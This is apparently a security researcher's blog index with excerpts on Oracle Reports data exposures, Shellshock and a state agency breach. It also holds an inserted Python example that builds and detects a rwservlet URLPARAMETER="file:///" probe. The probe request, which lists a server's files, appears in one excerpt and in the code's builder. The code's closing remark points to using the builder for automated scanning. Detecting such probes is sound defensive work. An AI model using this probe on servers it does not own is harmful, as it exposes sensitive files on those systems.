Welcome to the NI@root Blog

This blog will contain pretty much anything NI@root feels is worth publishing. This will include, but not be limited to: Stuffz.

Operation Oracle Reports Anti-Databreach

I think there has been enough media attention on Oracle Reports data exposures, and hopefully there are fewer exposures than there were a couple of months ago. I have decided to automate the testing of Oracle Reports servers in the US for possible data exposures, as well as servers that are vulnerable to exploits that

Read More

Massive Oracle Reports Data Exposures

Before coming to Phoenix for a pentest contract I had done research and discovered around 30 sensitive data exposures on systems that were managed by state government, county school systems, medical establishments, dental, higher education and more. I had contacted the Philadelphia FBI office and at first they seemed interested in helping me but then

Read More

Shellshock – CVE-2014-6271 – Exploits in the Wild

*note* This page is being updated as new information comes in. For those who run web applications that could be an attack vector for the BashBug, a.k.a. Shellshock, you may want to take this VERY seriously. There are already 4 Metasploit modules in the works: Pull #3880 modules/auxiliary/admin/http/bash_env.rb (confirmed by NI@root); Pull #3882 osx vmware/bash priv escalation

Read More

Goofy Oracle Reports URLPARAMETER Stuffz

I have already tried to exploit this and it seems it can't be, or would be very difficult to, exploit, so I am going to publish this here. Short and sweet. Exploiting a vulnerable Oracle Reports server using URLPARAMETER goes like this:
/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///"
This will give you the root directory of the

Read More
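The rwservlet request shape quoted in the Goofy Oracle Reports URLPARAMETER post, turned into an added example for the defensive side (this is not code from the post or from NI@root): a builder for that probe URL, a parser for rwservlet's key=value argument string, and a check that flags JOBTYPE=rwurl requests whose URLPARAMETER points at a file: URL in web-server access logs. The log lines and hostnames are constructed for the example; treating '+', space and '&' as argument separators and comparing keys case-insensitively are assumptions of the example, not something the post states.

```python
"""Flag Oracle Reports rwservlet URLPARAMETER=file: probes in access logs.

Added example (not from the NI@root post). Assumptions: rwservlet takes
key=value pairs separated by '+', space or '&', and keys are compared
case-insensitively. Hostnames and log lines below are constructed.
"""
import re
from urllib.parse import unquote, urlsplit


def build_probe_url(base):
    """Return the probe URL quoted in the post for a given server base URL."""
    return (base.rstrip("/")
            + "/reports/rwservlet?report=test.rdf+desformat=html"
            + "+destype=cache+JOBTYPE=rwurl+URLPARAMETER=\"file:///\"")


def parse_rwservlet_args(url):
    """Split the rwservlet argument string into an upper-cased key -> value dict.

    The standard query-string parsers turn '+' into a space and would fold
    the whole string into one key, so the pairs are split by hand (assumed
    separators: '+', whitespace, '&'). Surrounding quotes are dropped.
    """
    query = urlsplit(url).query
    args = {}
    for token in re.split(r"[+&\s]+", query):
        token = unquote(token)
        if "=" not in token:
            continue
        key, _, value = token.partition("=")
        args[key.upper()] = value.strip("\"'")
    return args


# Request line inside an Apache/NCSA style access log entry
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def is_rwurl_file_probe(log_line):
    """True when the logged request asks rwservlet to fetch a file: URL via rwurl."""
    m = LOG_RE.search(log_line)
    if not m or "/rwservlet" not in m.group(1).lower():
        return False
    args = parse_rwservlet_args(m.group(1))
    return (args.get("JOBTYPE", "").lower() == "rwurl"
            and args.get("URLPARAMETER", "").lower().startswith("file:"))


def find_probes(lines):
    """Return the log lines that carry a rwurl file: probe."""
    return [line for line in lines if is_rwurl_file_probe(line)]


# Constructed sample log lines (fictitious RFC 5737 addresses, fictitious hosts)
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2014:10:00:01 -0700] "GET /reports/rwservlet?'
    'report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl'
    '+URLPARAMETER=%22file:///%22 HTTP/1.1" 200 1532',
    '198.51.100.7 - - [10/Oct/2014:10:00:02 -0700] "GET /reports/rwservlet?'
    'report=sales.rdf+desformat=pdf+destype=cache HTTP/1.1" 200 80231',
    '203.0.113.5 - - [10/Oct/2014:10:00:03 -0700] "GET /reports/rwservlet?'
    'report=test.rdf+jobtype=rwurl+urlparameter=file:///etc/ HTTP/1.1" 200 2100',
]

if __name__ == "__main__":
    print(build_probe_url("http://reports.example.test"))
    for hit in find_probes(SAMPLE_LOG):
        print("rwurl file probe:", hit)
```

The same parser serves the offensive side from the first post (automated testing of Oracle Reports servers): build the URL with build_probe_url, fetch it, and inspect the response; only the request shape is taken from the post, so what a given server returns for it is not asserted here.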

Breach – Texas Department of Family and Protective Services

Thank you Rhino Security Labs! http://www.rhinosecuritylabs.com/oracle-data-exposure-vulnerability/ I am Dana Taylor, founder of NI@root and Lead Researcher at Rhino Security Labs. I recently discovered a significant exposure of data on a government server for Texas Department of Family and Protective Services. The data found was incredibly sensitive and should never have been publicly available. As reported by

Read More